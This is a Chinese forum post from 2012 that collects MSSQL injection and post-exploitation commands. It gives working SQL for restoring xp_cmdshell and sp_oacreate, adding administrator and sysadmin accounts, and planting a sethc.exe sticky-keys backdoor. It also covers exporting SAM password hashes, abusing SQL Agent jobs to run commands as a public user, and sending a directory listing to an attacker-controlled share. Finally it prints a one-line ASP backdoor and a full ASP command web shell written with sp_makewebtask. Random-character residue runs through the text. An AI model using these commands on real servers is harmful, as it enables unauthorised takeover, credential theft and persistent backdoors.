1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号! P( f2 V' B% G6 N$ { A6 t
恢复方法:查询分离器连接后, s) n' Y9 `8 p3 [+ p5 _% j m
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ T- W; r7 I [) X' [! J v第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' ' ?1 V: D0 T; y: U: R# Q
然后按F5键命令执行完毕2 p# f" n6 N) q6 k9 x
; }+ |# q# L- @4 P( p% e) N2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)* t' i6 a3 w/ e. H8 w. o. z; y: Q
恢复方法:查询分离器连接后,) J6 ]! l9 R5 H Y2 ? Z
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"% `% K% k, y9 V9 t
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ A& V- n$ g' R, G然后按F5键命令执行完毕 ~ e6 B# c. P+ M6 C! H7 U
$ H/ v( B x, b1 z
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
5 y$ h8 |4 t; }0 Q& _0 Q! s( m恢复方法:查询分离器连接后,( [3 C. u3 m4 z0 Z+ h- V C9 Q( S
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
/ g* Y. c% @+ G) @* W第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 5 z* b1 b0 ^# z
然后按F5键命令执行完毕( C0 j3 {# {9 b V( y# X0 P
/ O+ N! K0 V7 ~1 N0 ^+ W0 Q4 终极方法.
( P/ B7 [5 N4 q& Q3 a6 G1 J1 _如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
1 t9 V$ w1 w+ G2 P' G4 }. \查询分离器连接后,
* Z6 t8 {; I2 n6 O$ y2000servser系统:
! j- A$ k. M: H* ^declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add', y; I& c0 y% C, }! i1 [* A
0 ^- F% z# E. {9 X
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add' G! S8 q5 s) C+ b
! X; _& V/ _* n$ H
xp或2003server系统:
! R% @8 p- ]4 l& \
$ M# }* E& U9 F5 N! t9 g: Xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
2 L# {; c) C' G5 K+ y2 h5 X$ A% M* R) \# |% ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
! I& b2 V- a4 i& ]5 N
4 P6 \) I" R0 q
7 M; t. A# p7 r6 E五个SHIFT
9 i9 ^) V8 Z9 N& @5 J2 L, S' Y ^declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';/ b( A! i2 I0 m |% |, v! W
4 k0 ?; O' p8 W% A! Y( zdeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
5 P# S- A+ s5 l0 \) \: u& `) U& R+ f4 N A% w
xp_cmdshell执行命令另一种方法
. T; F" S. [/ L3 | F% D+ P9 adeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
8 M7 A9 m- y( h% _0 m! `
# s( P/ F+ I" C) ~7 ]3 L判断存储扩展是否存在$ A; l# k4 U9 j" M0 C
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
7 `& U. R5 N0 c* O7 C0 }返回结果为1就OK
; C0 k$ u$ ^* T# U# _( P% o
+ j) M1 Y2 {. c) g- D
. H' z f* `( Z9 v: b4 y- i上传xplog70.dll恢复xp_cmdshell语句:
8 d* E, q' ~0 Jsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
) }/ x9 }$ b5 p: P' Q/ M
: {4 V% }. ?% G$ N g否则上传xplog7.0.dll* n* g4 J' X, k: {/ v! v3 p- K6 P
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'% h* [, m! X* Y" Y: o. P( [5 X; I
" h8 ~& J, E' F" P, Q; [3 q! D
3 U) |. z$ t/ B! L' F7 W0 [0 P% Y" b: z1 Z6 m! Y( Q( g
首先开启沙盘模式:
6 w2 f0 g6 c1 b- l% l9 C+ [exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1, s& t/ ^0 [' y' V7 L
$ d) w! l1 u- M% T* X, `然后利用jet.oledb执行系统命令
. {1 J1 t2 B! S8 J6 Iselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')# h: \: i3 y4 ^; f0 v3 D0 a, @/ a
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
( u, @; P4 d x/ B& t
% I* {1 E. k" m- t2 M; T u5 h7 m; {2 I) r! m0 A: u) s1 V
# d, w: L% [. a/ J% A+ ^ ^* G
恢复过程sp_addextendedproc 如下: , X( K! h$ D3 X+ @* k7 V
create procedure sp_addextendedproc --- 1996/08/30 20:13 % y9 \/ l& u3 _+ ]) K0 [; ~# `
@functname nvarchar(517),/* (owner.)name of function to call */
# D+ m( j, @/ z5 x@dllname varchar(255)/* name of DLL containing function */ & a4 [6 |5 d( T3 j* }9 y! V9 B
as
1 i4 P0 y: C( x. s7 jset implicit_transactions off $ G& X6 f% v' M* x9 H/ G' @
if @@trancount > 0
: F7 [/ L7 Z$ ?3 f8 _: T8 rbegin ( q7 B! o5 C2 f8 g$ N7 Y7 K3 s
raiserror(15002,-1,-1,'sp_addextendedproc') , r5 D( v3 C1 }/ H
return (1) 1 Z# z; b' H1 k# B% R
end
0 I- Y T2 K* P( e( edbcc addextendedproc( @functname, @dllname) % j1 r Y: ^4 Q, m- u6 @
return (0) -- sp_addextendedproc
' k# B& w1 U' WGO
, [: K+ Z" b7 p0 h" Z
, [/ o. \. F2 g1 R. x
. r1 B b" A( U0 r) G+ A7 t7 Y/ e$ W8 S
导出管理员密码文件
- ]# i4 E! O' X5 ^# ]: ]# msa默认可以读sam键.应该。+ s: c# X# j/ d
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
! `+ ~4 d$ n. |/ N' h; _4 Gnet user administrator test
7 }) I6 f# j% y3 `用administrator登陆. x8 O- X% Q" J$ i
用完机器后
$ f/ `' P5 L1 q- @reg import c:\test.reg
3 e4 E S4 f3 d( T* v8 S根本不用克隆.2 A. I8 N, n3 E. `. n/ r- v- b
找到对应的sid.
" Y" t; A* s- W: A$ X9 A
0 O0 \. _7 F; K' \
% N. o4 s) ^* T( z" w0 o, J8 {: W4 b+ i$ n1 |& l
恢复所有存储过程$ I- p4 ]8 t& @/ {3 t! \4 c# o
use master
* w G6 l X t! K! L. A5 ~2 sexec sp_addextendedproc xp_enumgroups,'xplog70.dll' 1 n3 ~: J5 ]# K+ N8 T
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
: n4 R& u0 {, Wexec sp_addextendedproc xp_loginconfig,'xplog70.dll'
; h# d6 W- t2 g% t0 X% M1 }8 h- {exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' 4 n W% F; A% Y7 p) Z
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 3 E) q' |, _+ _: J
exec sp_addextendedproc sp_OACreate,'odsole70.dll' 4 v+ e P P5 M- A) b: p2 `
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' ! T! ?% x" m f. V9 g- i4 s2 _
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
' p7 M8 p. ^3 c7 f7 \( v8 R7 Yexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
& p- @% I0 M& J! F; t' |exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
* ?$ f& p; _- Hexec sp_addextendedproc sp_OASetProperty,'odsole70.dll' 4 L* a+ s1 m C q' Q* j. m
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
" P! z& C+ L& M% ]9 m# z1 bexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' - g" S6 l! E# e6 {8 ^: B
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
W$ g# c0 [: x+ wexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' . p5 G) Y/ q1 n3 E
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' - B3 O4 @* v/ D& I3 d9 ]5 ?' T' [
exec sp_addextendedproc xp_regread,'xpstar.dll'
5 @1 q$ q- G7 d* b# y% |exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 3 q0 G2 X8 b0 [; }+ `, N- O
exec sp_addextendedproc xp_regwrite,'xpstar.dll' ; J) e" c. A1 B/ s, [
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
* X% W! g ^* T& R% [1 K0 [% V+ |/ y) L4 j6 r
. ~1 }/ n0 D! o, Y6 \9 z
建立读文件的存储过程- o# z3 I( \* V2 e' p' O- I& V: U
Create proc sp_readTextFile @filename sysname5 J1 X' i! k& C1 b, j
as
3 B' g2 ?5 T1 W% T6 G8 d! G
( y8 S" F+ n5 D0 H. C7 f begin
) p3 [7 @( f: F7 m: _" g set nocount on
8 a; d1 T( U8 Q4 b: | Create table #tempfile (line varchar(8000))$ v* F; [+ P. m" ^; C
exec ('bulk insert #tempfile from "' + @filename + '"')+ ^4 V9 E X! Y3 v9 k
select * from #tempfile
x: I/ Y+ m( x! }- K/ p; L2 F8 ^/ w drop table #tempfile9 O5 x( R/ ]. Y! M8 _
End
4 n! \0 ?1 }2 L6 z) D3 `8 s! N: N* Z+ k% I5 j: r# t: l
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
) D7 o8 l) M3 [, ?3 Y查看登录用户9 k3 S) o' a' N
Select * from sysxlogins
+ O+ z+ O+ F% H$ q( l7 O4 H5 `) o: z% O# U8 D' K2 ^
把文件内容读取到表中1 g7 t: i' F) C' D" ~
BULK INSERT tmp from "c:\test.txt" S5 c$ I$ H% w3 o0 ^. X
dElete from 表名 清理表里的内容
" Q/ j! |$ w/ C: `5 ucreate table b_test(fn nvarchar(4000));建一个表,字段为fn* V8 ]/ k/ g; d; I4 s7 l! m6 E
f+ q# E1 x$ B- K% u
7 O9 s, U" u9 o" t加sa用户& M, _$ n" ^$ ?
exec master.dbo.sp_addlogin user,pass;5 u6 S) V6 j1 }; |3 e
exec master.dbo.sp_addsrvrolemember user,sysadmin( c- G: B2 {+ b" F- W
* E# i; Q+ I- M" t. ?
4 b7 e4 f3 {9 c
6 D5 o' d1 d: \& x
读文件代码. M9 O: h+ D; _+ [8 ]
declare @o int, @f int, @t int, @ret int
+ n/ C4 k( u/ f! d; Q: e8 C2 }- K7 rdeclare @line varchar(8000)
- S& s5 }# Y2 z# Aexec sp_oacreate 'scripting.filesystemobject', @o out8 K7 R& T* e* T$ G; D
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 16 N. l9 o, ]6 H+ { {
exec @ret = sp_oamethod @f, 'readline', @line out a# ~8 r w% G# F
while( @ret = 0 )
: u3 i9 R3 ?3 Wbegin
2 G5 f& N, ^* T% C; Xprint @line
: C( _* ^. i0 d7 U# Mexec @ret = sp_oamethod @f, 'readline', @line out
" H* e7 y. z: b1 j2 ^ G, ]1 T6 `end7 F# `. W X. O6 j3 W, k* @ ~1 l
- N" o1 l7 K! G' w* j1 G2 L
8 R5 N8 g9 o {写文件代码:
9 F" d, b+ G8 b' \! W' v3 a7 _declare @o int, @f int, @t int, @ret int
' g# I2 x. e0 |exec sp_oacreate 'scripting.filesystemobject', @o out( m; c5 o$ o1 S5 A) q' a! V; m
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1 Z% a( e# Z" P+ X, L! X1 W5 a
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》6 h/ D, E; D6 M) q) O: l, f
9 P; m B- e$ G+ |7 C% o. e6 M3 F9 e( n J* h7 E; J! B6 K
添加lake2 shell2 Q# h5 Z. T- ]0 N9 X: H
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
8 z1 {0 v+ u+ K @! Zsp_dropextendedproc xp_lake2
1 ^% G$ U( M) kEXEC xp_lake2 'net user'' h8 R9 }( K) `6 m: i
# c! _3 W: r' l9 k' ]' a# g
, p9 D0 a- u i7 x+ ^; e; \+ P/ o得到硬盘文件信息
3 Z5 Y) K! }1 }# l8 V) W; [' o--参数说明:目录名,目录深度,是否显示文件 9 h6 H5 e! ]6 v# q
execute master..xp_dirtree 'c:' / m6 f: O3 B& m' x/ ?1 u2 A5 E1 d
execute master..xp_dirtree 'c:',1
6 T/ v1 s: i: m8 B$ i/ nexecute master..xp_dirtree 'c:',1,1 7 P1 z. B6 K# H9 k$ G' n6 L g- U
& G& V! ^) |* f; f' _8 \
% N" {- f! @3 O2 T9 I+ U1 K7 U3 t读serv-u配置信息
6 F, H/ z! T8 a( T' V: p! ^( @exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'1 H- d9 q: ?; ]8 _. n; W! ^% H
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
7 G- {! F2 G, e* n5 ~+ G# S# K! I& ^, E0 d7 @
通过xp_regwrite写SHIFT后门
* U3 s3 C8 n" r8 {5 z. M) v% J) nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--0 Z6 p! I7 p- I) y( a
! ~1 J% S; t$ \2 Q. o4 b( @0 K
6 I; R* v" m, c5 f0 m
' m Q) r% w4 S找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
0 s1 g1 U! D# i* M+ S. Qexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了+ I$ y; {5 H* z1 m8 H
( U( x5 o! K2 J3 {) r% f. L8 JEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
# v; D3 H% F) t4 w! z$ d/ `2 c4 Z- \# J! \2 m9 h
: i/ i U+ ]" e+ t$ K
; s& o8 H9 [0 K3 wsql server 2005下开启xp_cmdshell的办法0 w6 V) T ]. U! q
0 F( |4 ^- I3 [( O2 p0 [
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
1 Y! j. S2 @* o. h5 C8 T6 n7 c+ X; D; U9 R& s2 l" q
SQL2005开启'OPENROWSET'支持的方法:
. {& U! m& w, Q! e7 f2 I6 A; t4 Q
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
* \0 G, Z! B* J2 G8 ]5 g% h8 u9 c' o/ `' E5 \. w
SQL2005开启'sp_oacreate'支持的方法:" p/ z. @ u1 K x
8 ~2 K: K; c8 o) ^8 x" sexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
# {" _9 m* Z2 c* X% z' c; G& p+ f4 }: z8 x2 G g" J
6 y8 c& L8 n* d) [6 r# {% j. h! o9 B& R, X
+ d& d8 R' w' }" s
0 t- T0 P2 r% \4 |9 q" u" D* u! P; R/ ?- p
" A Q6 p+ G) A6 k3 J4 j
( o1 W6 B. _& p7 h% v8 B
- U" o- R/ `& ^1 N% j% p+ N! q4 w
3 e/ q6 K1 W8 T! l6 a! ?
6 B% K$ |& L7 L' G+ n( v% i
M* D3 `( O! {/ r( ~
b4 e" y) c5 U; q6 M, }5 S
5 i8 T; X' x3 q" `" W; L3 ~
( |: A+ B1 a4 n+ m* ^. h y F
& K8 d) Q+ t0 J" Q6 g; u7 Z2 { n& g3 R7 G7 b7 [6 Z! j- _ y R
- ~2 K8 @6 v7 ^
1 F3 c) i2 D0 B1 X/ e5 I* q' a
0 k$ i& q" N: m' K' f, C
' g) g& [! y. @5 S4 w7 ^- g
' u: u1 o# C$ z7 m& u
以下方面不知道能不能成功暂且留下研究哈:7 m' H# j. I& D- |3 ]# x
4)
9 P( g# u; v& u* A& quse msdb; --这儿不要是master哟# H) q7 [( |% j2 d1 V
exec sp_add_job @job_name= czy82 ;. P. K$ g8 J9 w, J
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
. h+ a$ a& V# Y( Y" W5 H% g: nexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
2 e( @' F5 M& y, f( c5 S, |exec sp_start_job @job_name= czy82 ;1 d4 d4 e/ N+ `/ B3 \) v
3 ~- j# K3 ]5 b9 r6 f+ B利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以% X( W* R2 u+ q; u% p" o
执行tsql语句了.
% |8 Z# ~. m# W* z1 Z. t对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
& ~. ?& I# h+ J2 ?第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
5 r: ~$ |; g5 xnet start SQLSERVERAGENT
! ^$ |# E A$ c6 r) g$ V1 T
) G6 O4 `1 z0 d: H+ P, _+ l对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
$ a0 Q2 |: {/ SUSE msdb
" I# Q8 Q8 b3 ~EXEC sp_add_job @job_name = GetSystemOnSQL ,2 k, A) g8 {5 t0 D
@enabled = 1,7 {; c# X% k! o6 ?+ Q
@description = This will give a low privileged user access to
/ `: }/ F* z1 f& Exp_cmdshell ,% \7 h- e# F/ C- S* X$ q
@delete_level = 1
" r! i: h, d. oEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,/ H( ~+ _) b- l) J$ X
@step_name = Exec my sql ,
2 u4 H% b$ M3 L@subsystem = TSQL , @$ B& S# D. M! v2 G- K
@command = exec master..xp_execresultset N select exec& n& n) ?; T' }9 [: n
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master ( n# o7 g) v% w$ t5 x
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,, g" {$ \3 R' S- j) O! b
@server_name = 你的SQL的服务器名 ) |8 B5 N9 b, O: Y- `3 N1 [
EXEC sp_start_job @job_name = GetSystemOnSQL
& j! |& u: u) R5 a) N$ \7 v) Z0 K8 k5 e& k8 v7 `
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
$ q' s! p+ |- }( y才让我们可以以public执行xp_cmdshell; X( h+ w1 z* o
& x" m3 P( x7 d+ K8 M G# D5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)! \. `# V! X! u! e* q9 a
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
" M z2 q- v( e& ~( ]
/ j6 i2 m& O! I' r0 w% }1 {USE msdb
5 @3 c$ H7 T" k# A/ LEXEC sp_add_job @job_name = ArbitraryFilecreate ,$ G# ~( [7 G: ^8 [: L
@enabled = 1,! @. Z6 Y4 o9 A( i4 ?" @/ K
@description = This will create a file called c:\sqlafc123.txt ,; V/ Y+ `* U$ J, T
@delete_level = 1* I) f$ W# E& \# I. m
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,( C5 S. w; r' Y, S
@step_name = SQLAFC ," _( ]0 [9 p5 L4 O0 ]& \) {9 r
@subsystem = TSQL ,9 g, C9 R# I/ I: h- o& Y0 i
@command = select hello, this file was created by the SQL Agent. ,
( X4 j1 {' w5 u3 }@output_file_name = c:\sqlafc123.txt
7 f( k' b5 L+ n( B0 REXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,& {6 r& X+ ]3 V6 a) c: p
@server_name = SERVER_NAME 5 A& P( r! q- j* }6 [; M
EXEC sp_start_job @job_name = ArbitraryFilecreate
8 t1 s3 x7 u0 W' R; ^
! j {3 g; B/ P0 r/ a1 J/ `( V如果subsystem选的是:tsql,在生成的文件的头部有如下内容
$ _1 l. r6 d/ K S. d* Z
. m" [- w+ [* f3 H# E- I1 k- w# J??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
/ n- _+ N- ?# G, S0 k----------------------------------------------* {4 V/ n3 {! K; O& b6 c
hello, this file was created by the SQL Agent.
* X6 R0 @8 r. [" `! F/ G9 y+ b8 B
+ b6 F# G5 i/ K p$ _(1 ?????)2 Y/ x! x% X" q& ~
2 v b; _7 L) ?2 R X* _$ I6 g所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员: v, o1 {( I1 A4 ], b
命令的vbs文件到启动目录!
& J' Z8 O- S; d
1 d5 {5 T9 a ?2 ]6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
3 E( k8 w2 f5 A关于sp_MScopyscriptfile 看下面的例子) K. u: q9 u* s! g! T, k
declare @command varchar(100)
+ ^( ~$ |4 i$ O5 G! [! R4 [" edeclare @scripfile varchar(200)
7 w+ U. `( q+ g9 g7 U: [; Sset concat_null_yields_null off 4 A$ p' P3 |$ p: ]6 w6 P! c
select @command= dir c:\ > "\\attackerip\share\dir.txt"
6 ?0 Z% F4 W; N, lselect @scripfile= c:\autoexec.bat > nul" | @command | rd " ( n6 C; w; R: N& ^! t
exec sp_MScopyscriptfile @scripfile ,
1 }; y3 Q0 p7 ^/ P, V4 n7 B6 s2 U Y: \3 C4 b5 c" Q
这两个东东都还在测试试哟/ z1 @; g' m' J Q4 s* x
让MSSQL的public用户得到一个本机的web shell
% |) t" i9 r8 G- t3 h4 e! ~) N; X7 R V: m- G5 J5 D5 ?
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
6 A/ f4 Q- o7 S5 K( u# N. _--@query= select <img src=vbscript:msgbox(now())>
$ ?0 t, ~; S5 V$ \. o' @--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
- _5 p, m$ }5 |) j8 v$ z@query= select * S; M O$ F% N5 u6 N, Q2 b
<%On Error Resume Next 3 a$ a2 ]( H7 h3 t2 E
Set oscript = Server.createObject("wscript.SHELL") . g/ D7 V' o8 P: r
Set oscriptNet = Server.createObject("wscript.NETWORK") 2 K5 u, E7 n y7 E6 B$ J
Set oFileSys = Server.createObject("scripting.FileSystemObject") # e8 Z7 o: l: I! @
szCMD = Request.Form(".CMD")
: m" m0 B. d/ UIf (szCMD <>"")Then
; G [+ ]" c3 h3 EszTempFile = "C:\" & oFileSys.GetTempName() # t5 \, q n9 k, u
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- L3 X" k; k6 Y9 ]5 J! O6 p# uSet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) ' `3 {0 s9 O" ^& H% d: r
End If %>
/ w. r9 i( t# r<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
$ j9 Q: u& I I" w9 v<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
1 M' t, T' E$ G8 q% p( r</FORM><RE>
5 u4 Z \) q+ r* r" T<% If (IsObject(oFile))Then 4 w1 z; n6 E* ]2 o0 T0 b$ x
On Error Resume Next ) \+ K7 }1 F( {& K* d& [
Response.Write Server.HTMLEncode(oFile.ReadAll)
* V8 _* D0 \. ioFile.Close , R* z% j2 S7 X! q) V
Call oFileSys.deleteFile(szTempFile, True)
' S. [4 I2 W ^7 NEnd If%>
0 o1 j& P' h& K" p* m) O+ d</BODY></HTML>
, H! R1 z; F6 M7 a6 R2 p/ J$ ^; ~; e |
发表于 2012-9-15 14:37:30
收藏
支持
反对